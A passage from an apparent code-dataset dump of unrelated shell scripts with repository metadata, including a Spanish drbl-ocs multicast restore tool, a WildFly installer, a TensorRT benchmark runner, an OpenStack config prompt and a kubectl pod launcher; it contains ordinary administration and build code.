	case $num in
	0) return 1;;
	1) resp=${items%% *};;
	*) resp=$(dialog --menu "$leyenda" $(menu_height num) 75 $num "$@") || return 2
		;;
	esac
	echo $resp
}
#
# Ask how many clients the image will be restored onto.
# $1: classroom where the clone takes place
#
pregunta_clientes() {
	local aula="$1" resp
	resp=$(dialog --inputbox "¿Sobre cuántos clientes en *$aula* desea realizar la restauración?" 10 55) || return 2
	# On invalid input the error text is echoed so the caller can show it.
	es_numero "$resp" || { echo "Se requiere un número natural" && return 1; }
	echo $resp
}
#
# Ask for the wait timeout (in minutes).
#
pregunta_tiempo() {
	local resp
	resp=$(dialog --inputbox "Temporización (en minutos)" 10 55 "10") || return 2
	es_numero "$resp" || { echo "Se requiere un número entero" && return 1; }
	echo $resp
}
#
# Ask which operation should be performed.
#
# return: prints one of the three actions
#
pregunta_accion() {
	# NOTE(review): the 'action' local is assigned but never used here.
	local action="$1" resp
	items="startdisk 'Restaurar discos completos'
		startparts 'Restaurar particiones individuales'
		stop 'Cancelar clonación multicast'"
	eval set -- $items
	dialog --notags --menu "Escoja la operación a realizar" $(menu_height 3) 45 3 "$@"
}
#
# Ask which disks will be restored (startdisk).
# $1: path to the image directory
#
pregunta_disks() {
	local imagedir="$1" cylinders heads sectors
	local disks="$(list_disks "$imagedir")" disk items
	local num=$(echo "$disks" | wc -w)
	# With a single disk there is nothing to choose.
	[ $num -eq 1 ] && echo $disks && return 0
	for disk in $disks; do
		# <disk>-chs.sf assigns cylinders/heads/sectors shell variables.
		eval $(cat "$imagedir"/$disk-chs.sf)
		# The checklist line will be e.g. "sda [~500G] 0".
		items=${items:+$items }" $disk [~$((cylinders*heads*sectors/2/1024/1024))G] 0"
	done
	eval set -- $items
	dialog --checklist "Seleccione los discos a restaurar" \
		$(menu_height $num) 45 $num "$@" || return 2
}
#
# Ask which partitions will be restored (startparts).
# $1: path to the image directory
#
pregunta_parts() {
	local imagedir="$1"
	local parts="$(list_parts "$imagedir")" part items
	local num=$(echo "$parts" | wc -w)
	[ $num -eq 1 ] && echo $parts && return 0
	while read line; do
		part=$(echo $line | egrep -o '^\w+')
		# Only offer partitions that belong to the image.
		echo "$parts" | grep -qw "$part" || continue
		# The checklist line will be e.g. "sda3 'ntfs :: 850M' 0".
		items=${items:+$items }"$part '$(echo $line | awk '{printf "%6s :: %6s\n", $3, $5}')' 0"
	done < "$imagedir"/blkdev.list
	eval set -- $items
	dialog --checklist "Seleccione las particiones a restaurar" \
		$(menu_height $num) 45 $num "$@" || return 2
}
#
# Work out what should be suggested about powering the server off.
#
# return:
#	1, the server should be powered off.
#	0, it should not.
#
get_server_off() {
	# parse_conf is defined elsewhere; it populates x_dhcp_type.
	parse_conf x
	[ $x_dhcp_type -ne 2 ]
}
#
# Build the option string passed to drbl-ocs on the server side.
# Reads the globals OPTS, post, clients, iface, time, check, action,
# imagedir and devices; prints the assembled command-line tail.
#
get_opts() {
    local opts
    opts="$OPTS -or / -o0 -o1 -x -k -p $post --clients-to-wait $clients --mcast-iface $iface"
    if [ "$time" -gt 0 ]; then
        # The user supplies minutes; drbl-ocs expects seconds.
        opts="$opts --max-time-to-wait $((time * 60))"
    fi
    if [ "$check" != "1" ]; then
        # -sc0 disables the image checksum verification.
        opts="$opts -sc0"
    fi
    echo $opts "$action multicast_restore '$imagedir' $devices"
}
#
# Build the option string the clients must boot with.
#
get_client_opts() {
	local DRBL_CONF="$DRBL_PATH/etc/drbl-ocs.conf"
	# Extract the multicast port from the drbl-ocs configuration.
	local port=$(grep -oP '(?<=^MULTICAST_PORT=")[0-9]+' "$DRBL_CONF")
	# $(echo $OPTS) collapses extra whitespace in the inherited options.
	local opts="$(echo $OPTS) -p $post --mcast-port $port"
	# NOTE(review): here $time is passed as-is, while get_opts multiplies
	# it by 60 (minutes -> seconds) — confirm the intended client unit.
	[ $time -gt 0 ] && opts="${opts} --max-time-to-wait $time"
	# ${action#start} turns startdisk/startparts into disk/parts.
	echo "$opts multicast_restore${action#start} $(basename "$imagedir") $devices"
}
# Parameters (defaults; some may be predefined by the PHP-side config)
batch=
clients=
iface=
#postaction=poweroff	# Defined in the PHP configuration
#server_off=2		# Defined in the PHP configuration
room=
simulate=
time=0 ; cltime=
action=
imagedir=
devices=
#
# Command-line argument parsing
#
while [ $# -gt 0 ]; do
	case $1 in
	-b|--batch)
		batch=1
		shift
		;;
	-c|--client-to-wait)
		es_numero "$2" || eerror 2 "$2: Número de clientes inválido"
		[ $2 -gt 0 ] || eerror 2 "El número de clientes debe ser al menos 1"
		clients=$2
		shift 2
		;;
	-h|--help)
		help
		exit 0
		;;
	-i|--mcast-iface)
		# Validate against the kernel's interface list.
		echo /sys/class/net/* | egrep -q '/'"$2"'\b' || eerror 2 "$2: La interfaz no existe"
		iface="$2"
		shift 2
		;;
	-o|--poweroff)
		server_off=1
		shift
		;;
	-n|--no-poweroff)
		server_off=0
		shift
		;;
	-p|--post)
		[ "$2" = "poweroff" ] || [ "$2" = "reboot" ] || [ "$2" = "true" ] || eerror 2 "$2: Acción desconocida"
		postaction=$2
		shift 2
		;;
	-r|--room)
		get_network "$2" > /dev/null || eerror 2 "$2: Aula desconocida"
		room=$2
		shift 2
		;;
	-s|--simulate)
		simulate=1
		shift
		;;
	-t|--max-time-to-wait)
		es_numero "$2" || eerror 2 "$2: Tiempo en segundos inválido"
		time=$2
		shift 2
		cltime=1 # Record that a timeout was explicitly set.
		;;
	-*) eerror 2 "$1: Opción desconocida"
		;;
	*) break
		;;
	esac
done
# Derive the missing half of the room/interface pair (-i takes precedence
# over -r, matching the help text).
if [ -n "$iface" ]; then
	room=$(iface2room "$iface") || eerror 2 "La interfaz no está asociada a ningún aula"
elif [ -n "$room" ]; then
	iface=$(room2iface "$room") || eerror 2 "El aula seleccionada no está asociada a ninguna interfaz"
fi
# Operation argument
if [ -n "$1" ]; then
	[ "$1" = "startdisk" ] || [ "$1" = "startparts" ] || [ "$1" = "stop" ] || \
		eerror 2 "$1: Operación desconocida"
	action=$1
	shift
fi
# Image argument
if [ -n "$1" ]; then
	imagedir=$(get_imgdir "$1") || eerror 2 "$1: La imagen no existe"
	shift
	aulas=$(list_aulas "$imagedir")
	[ -n "$room" ] && aulas=$(echo "$aulas" | egrep ^$iface'\b')
	[ -z "$aulas" ] && eerror 2 "La imagen no es visible${room:+ desde $room}"
fi
# Device arguments
if [ $# -gt 0 ]; then
	# "ask_user" is equivalent to giving nothing: it forces the question.
	if [ "$*" = "ask_user" ]; then
		shift 1
	else
		dev=$(check_devices "$action" "$imagedir" "$@") || eerror 2 "$dev: Dispositivo inválido o inexistente para la operación ${action:-?}"
	fi
else
	# TODO: could detect the case where only one device is possible.
	true
fi
devices=$*
# Batch mode cannot ask interactively, so everything must be present.
if [ -n "$batch" ]; then
	case "$action" in
	stop) [ -z "$room" ] && eerror 2 "Modo batch: faltan datos";;
	*) { [ -z "$room" ] || [ -z "$clients" ] || [ -z "$imagedir" ] || \
		[ -z "$action" ] || [ -z "$devices" ]; } && eerror 2 "Modo batch: faltan datos";;
	esac
fi
#
# Interactively complete any required data not given on the command line.
#
while [ -z "$action" ]; do
	action=$(pregunta_accion "$action") || cancel "¿Desea cancelar el lanzamiento?"
done
while [ -z "$imagedir" ]; do
	imagedir=$(pregunta_imagen "$room")
	case $? in
	0) ;;
	1) error "No hay imágenes disponibles en $room" ; exit 1;;
	2) cancel "¿Desea cancelar la operación?";;
	esac
done
# Resolve the human-readable image name from its descriptor.
image=$(read_desc "$imagedir/$descfile" x; echo $x_nombre)
while [ -z "$iface" ]; do
	iface=$(pregunta_aula "$imagedir" "$image")
	case $? in
	0) ;;
	1) error "$image no es visible desde ningún aula"; exit 1;;
	2) cancel "¿Desea cancelar el lanzamiento?";;
	esac
done
room=$(iface2room "$iface")
# "stop" needs no further data: cancel the running restore and leave.
if [ "$action" = "stop" ]; then
	if [ -n "$simulate" ]; then
		echo $DRBL_OCS -or / -o1 --mcast-iface "$iface" stop xxxx "$imagedir"
	else
		$DRBL_OCS -or / -o1 --mcast-iface "$iface" stop xxxx "$imagedir"
	fi
	exit 0
fi
# Ask for the number of clients until a valid value is given.
while [ -z "$clients" ]; do
	clients=$(pregunta_clientes "$room")
	status=$?
	[ "$clients" = "0" ] && status=2 # Zero clients: offer to cancel.
	case $status in
	0) break ;;
	1) error "$clients"
	   # Reset so the loop asks again. The original assigned 'clientes='
	   # (a typo), which left the error message in $clients and ended
	   # the loop with an invalid value.
	   clients=
	   ;;
	2) cancel "¿Desea cancelar el lanzamiento?";;
	esac
done
# Ask for the wait timeout unless -t already set it.
while [ -z "$cltime" ]; do
	time=$(pregunta_tiempo "$time")
	case $? in
	0) cltime=1;;
	1) error "$time";;
	2) cancel "¿Desea cancelar el lanzamiento?";;
	esac
done
# Ask for the devices to restore, according to the chosen operation.
while [ -z "$devices" ]; do
	case $action in
	startdisk) devices=$(pregunta_disks "$imagedir") || cancel "¿Desea cancelar el lanzamiento?";;
	startparts) devices=$(pregunta_parts "$imagedir") || cancel "¿Desea cancelar el lanzamiento?";;
	stop) break;;
	*) eerror 5 "$action imposible";;
	esac
done
# Strip the quotes whiptail adds around the device list.
eval devices=\"$devices\"
# Decide on the server power-off delay (pregunta_lapso defined elsewhere).
while [ "$server_off" = "2" ]; do
	get_server_off
	off=$?
	[ $off -eq 1 ] && default=2
	lapso=$(pregunta_lapso "$default" $off)
	case $? in
	0) break;;
	1) ;;
	2) cancel "¿Desea cancelar el lanzamiento?";;
	esac
done
if [ "$simulate" ]; then
	echo $DRBL_OCS $(get_opts)
	[ -n "$lapso" ] && echo "Se apagará el servidor $lapso segundos después de haber acabado"
else
	eval set -- $(get_opts)
	# DELAY and OPTS are exported for the spawned drbl-ocs process tree.
	export DELAY="$lapso" OPTS="`get_client_opts`"
	nohup $DRBL_OCS "$@" > /dev/null 2>&1 &
	dialog --msgbox "Preparada la restauración multicast de $image. Ya puede incorporar clientes." 8 60
fi
| true |
6943d37c9d6c1a3615c95df886b5b95c3eb91032
|
Shell
|
inissa/system-management
|
/buildscripts/buildintltool
|
UTF-8
| 331 | 2.734375 | 3 |
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash -e
# Build script for intltool; exports the package metadata expected by the
# shared master.sh build driver sourced at the bottom.
export PKGNAME=intltool
export PKGVER=0.51.0
export PKGTAR=${PKGNAME}-${PKGVER}.tar.gz
export PKGURL="https://launchpad.net/intltool/trunk/${PKGVER}/+download/${PKGTAR}"
export MAKE_JOBS_FLAGS="-j4"
export KEEP_STATIC=1
# Hook run before ./configure: patch a regex escape in intltool-update.in.
configure_pre() {
	sed -i 's:\\\${:\\\$\\{:' intltool-update.in
}
. $(dirname $0)/master.sh
| true |
d18e8a63caae387993e26404dc58da35bc1eb61f
|
Shell
|
v-arcade/wildfly_vRA
|
/WildFly11_install_script_vRA.sh
|
UTF-8
| 606 | 3.15625 | 3 |
[] |
no_license
|
#! /bin/bash
# Install WildFly 11 from either an external HTTP repo or a local archive.
echo "External Repo value=" "$ExternalRepo"
# NOTE(review): the banner prints $ExternalRepo while the decision below
# uses $useExternalRepo — confirm which variable the provisioning layer sets.
# Quote the test operands: the original unquoted form was a test syntax
# error whenever $useExternalRepo was unset or empty.
if [ "$useExternalRepo" = "Yes" ];
then
	echo "Getting file from External Repo"
	wget --no-check-certificate -O /tmp/wildfly-11.0.0.CR1.tar.gz "$repoURL/wildfly-11.0.0.CR1.tar.gz"
	cd /tmp
	/bin/gunzip /tmp/wildfly-11.0.0.CR1.tar.gz
	mv /tmp/wildfly-11.0.0.CR1.tar "$wildflyHome"
else
	echo "Using local Repo"
	cd "$sourceLoc"
	/bin/gunzip "$sourceLoc"/wildfly-11.0.0.CR1.tar.gz
	mv "$sourceLoc"/wildfly-11.0.0.CR1.tar "$wildflyHome"
fi
cd "$wildflyHome"
/bin/tar -xvf "$wildflyHome"/wildfly-11.0.0.CR1.tar
| true |
2a95608b66ddde85129e5cd01ee3a249a391a48c
|
Shell
|
ScallyBag/jetson-inference
|
/tools/benchmark-models.sh
|
UTF-8
| 1,802 | 3.6875 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# this script benchmarks DNN models from jetson-inference
# using the TensorRT trtexec tool and logs the results.
#
# usage: ./benchmark-models.sh <log-dir> <iterations> <runs>
#
# trtexec will profile the execution time of the network
# over N iterations, each iteration averaging over M runs.
#
# If unspecified, the default number of iterations is 10.
# If unspecified, the default number of average runs is 10.
#
# If the output log directory is left unspecified, the logs
# will be saved under the benchmark_logs/ directory.
#
# Resolve paths and the benchmark parameters (log dir, iterations, runs).
ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
NETWORKS="$ROOT/../data/networks"
TRT_EXEC=/usr/src/tensorrt/bin/trtexec
LOG_DIR=$1
ITERATIONS=$2
AVG_RUNS=$3
if [ -z "$LOG_DIR" ]; then
	LOG_DIR="benchmark_logs"
fi
if [ -z "$ITERATIONS" ]; then
	ITERATIONS="10"
fi
if [ -z "$AVG_RUNS" ]; then
	AVG_RUNS="10"
fi
# -p: do not fail when the log directory already exists (plain `mkdir`
# aborted every re-run of the benchmark).
mkdir -p "$LOG_DIR"
# Profile one ONNX model with trtexec and tee the output to the log dir.
# $1: model directory under $NETWORKS
# $2: model filename (defaults to fcn_resnet18.onnx)
# $3: output layer name (defaults to output_0)
function benchmark_onnx()
{
	model_dir=$1
	model_name=$2
	output_layer=$3
	if [ -z "$model_name" ]; then
		model_name="fcn_resnet18.onnx"
	fi
	if [ -z "$output_layer" ]; then
		output_layer="output_0"
	fi
	# FP16 profiling; the per-model log mirrors what is shown on screen.
	$TRT_EXEC --onnx=$NETWORKS/$model_dir/$model_name --output=$output_layer --iterations=$ITERATIONS --avgRuns=$AVG_RUNS --fp16 | tee $LOG_DIR/$model_dir.txt
}
# Benchmark every bundled FCN-ResNet18 segmentation model, one log each.
benchmark_onnx "FCN-ResNet18-Cityscapes-512x256"
benchmark_onnx "FCN-ResNet18-Cityscapes-1024x512"
benchmark_onnx "FCN-ResNet18-Cityscapes-2048x1024"
benchmark_onnx "FCN-ResNet18-DeepScene-576x320"
benchmark_onnx "FCN-ResNet18-DeepScene-864x480"
benchmark_onnx "FCN-ResNet18-MHP-512x320"
benchmark_onnx "FCN-ResNet18-MHP-640x360"
benchmark_onnx "FCN-ResNet18-Pascal-VOC-320x320"
benchmark_onnx "FCN-ResNet18-Pascal-VOC-512x320"
benchmark_onnx "FCN-ResNet18-SUN-RGBD-512x400"
benchmark_onnx "FCN-ResNet18-SUN-RGBD-640x512"
| true |
d4891890b1bf1a58441043150141defc0f0e50a9
|
Shell
|
vulture29/openstack-auto-deploy
|
/scripts/user_config.sh
|
UTF-8
| 4,273 | 3.390625 | 3 |
[] |
no_license
|
#!/bin/bash
# Interactive configurator for an OpenStack deployment: either use the
# default all-in-one config, reuse an existing customized config, or ask
# the user for node IPs and service toggles and patch the default file.
USER_INPUT=1;
CUSTOMIZED_CONFIG_PATH="config/rc.conf"
DEFAULT_CONFIG_PATH="config/rc.conf.default"
echo ""
while read -p "Want to proceed with default config -- allinone?(yes/no) " REPLY1 ; do
    case $REPLY1 in
        yes)
            echo ""
            echo "--> Installing with the default config."
            # install with allinone
            # update the CONFIG_FILE_PATH to default
            CONFIG_FILE_PATH=config/rc.conf.default
            break;;
        no)
            echo ""
            echo "--> Checking if the customized config file is existed."
            if [ -f $CUSTOMIZED_CONFIG_PATH ]; then
                # the customized config file is existed
                echo ""
                echo "The customized config file is existed."
                echo ""
                while read -p "Install with the existed file?(yes/no) " REPLY2 ; do
                    case $REPLY2 in
                        yes)
                            echo ""
                            echo "--> Installing with the existed config file."
                            USER_INPUT=0;
                            # install with the existed config file
                            # update the CONFIG_FILE_PATH to user configured file
                            CONFIG_FILE_PATH=config/rc.conf
                            break;;
                        no)
                            break;;
                        *)
                            echo ""
                            echo "Please enter (yes) or (no).";;
                    esac
                done
            else
                echo ""
                echo "The customized config file is not existed."
            fi
            if [ $USER_INPUT -eq 1 ]; then
                echo ""
                echo "--> Starting user input configuration."
                # user input configuration: node IPs first, then per-service
                # enable flags (y/n), each validated in its own loop.
                echo ""
                read -p "Please enter the network node IP (x.x.x.x): " NETWORK_IP
                echo ""
                read -p "Please enter the compute node IP (x.x.x.x): " COMPUTE_IP
                echo ""
                read -p "Please enter the controller node IP (x.x.x.x): " CONTROLLER_IP
                echo ""
                read -p "Please enter the storage node IP (x.x.x.x): " STORAGE_IP
                echo ""
                while read -p "Do you want to enable NOVA?(y/n)" NOVA_ENABLE ; do
                    case $NOVA_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                while read -p "Do you want to enable NEUTRON?(y/n)" NEUTRON_ENABLE ; do
                    case $NEUTRON_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                while read -p "Do you want to enable GLANCE?(y/n)" GLANCE_ENABLE ; do
                    case $GLANCE_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                while read -p "Do you want to enable HORIZON?(y/n)" HORIZON_ENABLE ; do
                    case $HORIZON_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                while read -p "Do you want to enable CINDER?(y/n)" CINDER_ENABLE ; do
                    case $CINDER_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                while read -p "Do you want to enable SWIFT?(y/n)" SWIFT_ENABLE ; do
                    case $SWIFT_ENABLE in
                        y) break;;
                        n) break;;
                        *)
                            echo ""
                            echo "Please enter y/n.";;
                    esac
                done
                echo ""
                # Back up the default config, then patch it in place with
                # the collected answers.
                cp $DEFAULT_CONFIG_PATH $DEFAULT_CONFIG_PATH".bkg"
                sed -i "s/^CONFIG_CONTROLLER_HOST.*$/CONFIG_CONTROLLER_HOST=$CONTROLLER_IP/g" $DEFAULT_CONFIG_PATH
                sed -i "s/^CONFIG_NETWORK_HOST.*$/CONFIG_NETWORK_HOST=$NETWORK_IP/g" $DEFAULT_CONFIG_PATH
                sed -i "s/^CONFIG_COMPUTE_HOST.*$/CONFIG_COMPUTE_HOST=$COMPUTE_IP/g" $DEFAULT_CONFIG_PATH
                sed -i "s/^CONFIG_STORAGE_HOST.*$/CONFIG_STORAGE_HOST=$STORAGE_IP/g" $DEFAULT_CONFIG_PATH
                sed -i "s/^CONFIG_NOVA_INSTALL.*$/CONFIG_NOVA_INSTALL=$NOVA_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                sed -i "s/^CONFIG_NEUTRON_INSTALL.*$/CONFIG_NEUTRON_INSTALL=$NEUTRON_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                sed -i "s/^CONFIG_GLANCE_INSTALL.*$/CONFIG_GLANCE_INSTALL=$GLANCE_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                sed -i "s/^CONFIG_HORIZON_INSTALL.*$/CONFIG_HORIZON_INSTALL=$HORIZON_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                sed -i "s/^CONFIG_CINDER_INSTALL.*$/CONFIG_CINDER_INSTALL=$CINDER_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                sed -i "s/^CONFIG_SWIFT_INSTALL.*$/CONFIG_SWIFT_INSTALL=$SWIFT_ENABLE/g" "$DEFAULT_CONFIG_PATH"
                # update the CONFIG_FILE_PATH to config file
                # NOTE(review): the sed edits above modify rc.conf.default,
                # yet CONFIG_FILE_PATH points at config/rc.conf — confirm a
                # later step copies the patched default into place.
                CONFIG_FILE_PATH=config/rc.conf
                # install with the default config file
                echo "--> Installing with the config file."
            fi
            break;;
        *)
            echo ""
            echo "Please enter (yes) or (no).";;
    esac
done
| true |
000d792b010401b92f7b21437750096847ef4ac3
|
Shell
|
palmer-dabbelt/home
|
/.local/src/paset.bash
|
UTF-8
| 600 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
# Switch the PulseAudio default sink/source to the device matching $1 and
# move every existing stream onto it.
# Resolve the first sink/source whose name matches $1, skipping monitors.
snkname="$(pacmd list-sinks | grep "name: .*$1.*" | grep -v ".monitor" | sed 's@ *name: <\([A-Za-z0-9_.-]*\)>.*@\1@' | xargs echo)"
srcname="$(pacmd list-sources | grep "name: .*$1.*" | grep -v ".monitor" | sed 's@ *name: <\([A-Za-z0-9_.-]*\)>.*@\1@' | xargs echo)"
pacmd << EOF
set-default-source $srcname
set-default-sink $snkname
EOF
# Re-route playback streams to the new sink.
pactl list sink-inputs short | cut -f1 | while read index
do
	pacmd move-sink-input "$index" "$snkname"
done
# Re-route capture streams to the new source (the 25Hz filter skips an
# internal stream; reason not evident here — TODO confirm).
pactl list source-outputs short | grep -v "25Hz" | cut -f1 | while read index
do
	pacmd move-source-output "$index" "$srcname"
done
| true |
7ec31ab15e80478f988ba12b469aea95e71a88e3
|
Shell
|
lisuke/repo
|
/archlinuxcn/numix-icon-theme/PKGBUILD
|
UTF-8
| 799 | 2.671875 | 3 |
[] |
no_license
|
# Maintainer: Maxime Gauduin <alucryd@archlinux.org>
# Contributor: Diego <cdprincipe@gmail.com>
# Current Maintainer <erik.dubois@gmail.com>
# Arch Linux PKGBUILD: VCS (git) package for the Numix icon themes.
pkgname=numix-icon-theme
pkgver=23.04.26.r0.g71b89af4f
pkgrel=1
pkgdesc='Base icon theme from the Numix project'
arch=('any')
url='https://github.com/numixproject/numix-icon-theme'
license=('GPL3')
depends=()
makedepends=('git')
provides=('numix-icon-theme' 'numix-light-icon-theme')
conflicts=('numix-icon-theme' 'numix-light-icon-theme')
options=('!strip')
source=('git+https://github.com/numixproject/numix-icon-theme.git')
sha256sums=('SKIP')
# Derive the version from the latest git tag: "TAG.rCOUNT.gHASH".
pkgver() {
	git -C numix-icon-theme describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
# Install both theme variants under /usr/share/icons.
package() {
	cd numix-icon-theme
	install -dm 755 "$pkgdir"/usr/share/icons
	cp -dr --no-preserve='ownership' Numix{,-Light} "$pkgdir"/usr/share/icons/
}
| true |
c602af64cee86f89cdfa9816d07bd4410eae6841
|
Shell
|
membly/homeworkLinux
|
/usr/bin/service_script.sh
|
UTF-8
| 303 | 3.140625 | 3 |
[] |
no_license
|
#!/bin/bash
# sd_notify-based worker: waits for writers on a FIFO and logs each wake-up.
mkfifo /tmp/notifyfifo
# Fix: the original ran 'chomod' (typo), which failed and left the FIFO
# with default permissions so other users could not signal the service.
chmod 777 /tmp/notifyfifo
systemd-notify --ready --status "Waiting for data"
while : ; do
	# Block until something is written to the FIFO.
	read a < /tmp/notifyfifo
	systemd-notify --status="Processing script"
	echo -e "\n$(date +"%m-%d-%y %T")\tSleep script was started" >> /tmp/service_script.log
done
| true |
c86aaee9c8ebadb31edd5e559b97124025a556a2
|
Shell
|
crazzyfool/scripts
|
/parameter-0.2.sh
|
UTF-8
| 2,746 | 3.703125 | 4 |
[] |
no_license
|
#!/bin/bash
echo ' ____ __ ____ ___ _ _ ___ _ _ ____ ___ __ _ ____ ____ ';
echo '( _ \ / _\(_ _)/ __)/ )( \ ___ / __)/ )( \( __)/ __)( / )( __)( _ \';
echo ' ) __// \ )( ( (__ ) __ ((___)( (__ ) __ ( ) _)( (__ ) ( ) _) ) /';
echo '(__) \_/\_/(__) \___)\_)(_/ \___)\_)(_/(____)\___)(__\_)(____)(__\_)';
echo ' ';
USERNAME=""
TICKET=""
DIRECTORY=$USERNAME-$TICKET
HOME="/home/wirehive"
PID=".dont-run.pid"
unset USERNAME
unset TICKET
while getopts u:t: option; do
case ${option} in
u )
USERNAME=${OPTARG}
;;
t )
TICKET=${OPTARG}
;;
*)
echo $1: unknown option >&2
exit 1
;;
esac
done
# Remove ALL whitespace characters from the input (not only the leading
# and trailing runs) and print the result.
trim_white_space() {
    local cleaned
    cleaned=$(echo -e "$1" | tr -d '[:space:]')
    echo "$cleaned"
}
# Validate a username: after whitespace removal it must be non-empty and
# consist of letters only. Returns 0 when valid, 2 otherwise.
# Side effect: leaves the cleaned value in the global TRIMMED_NAME,
# as the original did.
validateUsername() {
    TRIMMED_NAME="$(trim_white_space "$1")"
    if [[ -z "$TRIMMED_NAME" || ! "$TRIMMED_NAME" =~ ^[A-Za-z]+$ ]]; then
        # empty, or contains digits/symbols
        return 2
    fi
    return 0
}
# Exercise validateUsername on the empty string. Fix: the original tested
# "$(validateUsername '')" -eq 2, comparing the function's (empty) stdout
# instead of its return status; [[ "" -eq 2 ]] evaluates as 0 -eq 2, so it
# always printed "Failed!". Check the exit code instead.
validateUsername ''
rv=$?
if [[ $rv -eq 2 ]]; then
	echo "Success!"
elif [[ $rv -eq 0 ]]; then
	echo "Failed!"
else
	echo "Not sure what would cause this!!"
fi
# Read the first line of the PID file named by the global $PID, convert
# ':' separators to spaces, store the result in the global OPTS (consumed
# later by the main flow) and print each token on its own line.
# Exits the whole script when the PID file is missing.
getPidData() {
    if [ ! -f "$PID" ]; then
        echo "PID not found"
        exit 1
    fi
    local firstline
    read -r firstline < "$PID"
    OPTS=$(echo "$firstline" | tr ":" " ")   # intentionally global
    echo "OPTS: $OPTS"
    for tok in $OPTS; do
        echo $tok
    done
}
# Resume from the PID file when present, otherwise fall back to CLI args.
if [ -f "$PID" ]; then
	echo "PID found! Checking for data...."
	getPidData
	# Fix: the original tested `$($OPT | wc -w)` — $OPT is undefined (a
	# typo for $OPTS) and was being *executed* as a command instead of
	# echoed, so the word count was always 0.
	if [ -n "$OPTS" ] && [ "$(echo $OPTS | wc -w)" -le 2 ]; then
		echo "yay"
	fi
else
	echo "PID not found, checking to see if parameters were passed....."
fi
| true |
b35c1859a824f60b1382b72f82cd1607f4407fb1
|
Shell
|
GGCCoder/Linux
|
/Bash/array/ex1_7.sh
|
UTF-8
| 332 | 2.90625 | 3 |
[] |
no_license
|
# selection sort (descending): sorts the positional parameters from
# largest to smallest and prints the result on one line.
i=0
array=($*)
while [ $i -lt ${#array[@]} ]
do
	# Find the index of the LARGEST remaining element (hence the
	# descending order of the final output).
	idx=$i
	j=$[$i+1]
	while [ $j -lt ${#array[@]} ]
	do
		if [ ${array[idx]} -lt ${array[j]} ]
		then
			idx=$j
		fi
		let j++
	done
#	echo "idx = ${idx}, value = ${array[idx]}"
	# Swap the maximum into position i.
	tmp=${array[i]}
	array[i]=${array[idx]}
	array[idx]=$tmp
	let i++
done
echo ${array[@]}
| true |
6ce853f180fd7eff53b4f627cf4147d9713e0611
|
Shell
|
android1and1/saltit
|
/scripts/tests/test_unsaltit
|
UTF-8
| 1,121 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
# filename test_unsaltit
# first of first,include abs root(directory) name.
# then start the famous 'The Quartet'.
# get some global variable -- "FUNCPATH" "ABSROOT" "include_all" "echotest" ..
project_dir=$( cd $( dirname $0 ) && cd ../../ && pwd -P )
. $project_dir/conf/abs.conf
. $project_dir/conf/options.conf
. ${FUNCPATH}/base 2>/dev/null
# disable all debug infomations of each function.
DEBUG=0
# Build a fixture directory with sample files, an ignore list and a token.
TEMPDIR=${ABSROOT}/temp/temp16
mkdir -p $TEMPDIR
echo 'data here .' > $TEMPDIR/a.txt
echo 'b.txt,after some while we will meet again.' > $TEMPDIR/b.txt
echo 'data here baby girl.' > $TEMPDIR/c.txt
touch $TEMPDIR/.token
echo 'a.txt' > $TEMPDIR/.ignores
# create real data file(crypted)
# `actively` and `iisr` come from the sourced function library.
actively
sleep 1
# first test
echotest "1st test,can run at last?"
# because at line no.7 there is a "cd ../../" means we are at working dir:saltit.
./scripts/unsaltit
iisr "$? -eq 0"
# second test
echotest "2nd test,really got decode_encoded file?"
cat ${ABSROOT}/DE_uploads/*b.txt
iisr "$? -eq 0"
# home keeping
rm -rf $TEMPDIR
rm -rf ${UPLOADS}/*data
rm -rf ${UPLOADS}/.flag
rm -rf ${ABSROOT}/DE_uploads/
| true |
c04a134de4e365166b9b645d030d78de7e03541b
|
Shell
|
coollog/kash
|
/kash
|
UTF-8
| 605 | 3.828125 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
# kash: run a throwaway Pod from IMAGE, attach to it, then clean it up.
if [ -z "$1" ]; then
	echo "Usage: ./kash <IMAGE>"
	exit
fi
POD_IMAGE=$1
POD_NAME=$(uuidgen | tr "[:upper:]" "[:lower:]")
# Applies the Pod template.
cat k8s/kash-pod.yaml |
	sed -e "s/{POD_NAME}/${POD_NAME}/" |
	sed -e "s/{POD_IMAGE}/${POD_IMAGE}/" |
	kubectl apply -f -
echo "Running pod ${POD_NAME}..."
# Waits for the Pod to start running. Fix: quote the command substitution —
# while the Pod has no phase yet it expands to nothing and the unquoted
# [ comparison was a test syntax error.
while [ "$(kubectl get po ${POD_NAME} -o jsonpath="{.status.phase}")" != "Running" ]
do
	sleep 1
done
# Attaches to the Pod.
kubectl attach -it ${POD_NAME} -c container
# Cleans up the Pod.
kubectl delete po ${POD_NAME}
| true |
0b25ca2d786b57d58c942f55e0732544637b199a
|
Shell
|
ruixueqingyang/OAO-Translator
|
/benchmarks/PolyBench/plain/BICG/bicg.sh
|
UTF-8
| 526 | 2.515625 | 3 |
[] |
no_license
|
#!/bin/bash
# Build and run the BICG PolyBench variants (OMP, DawnCC, OAO) and collect
# their outputs into a single result file.
cd /home/anjushi/work/polybench/plain/BICG
make clean
export LD_LIBRARY_PATH=/home/wfr/install/LLVM-9/install-9/lib:$LD_LIBRARY_PATH
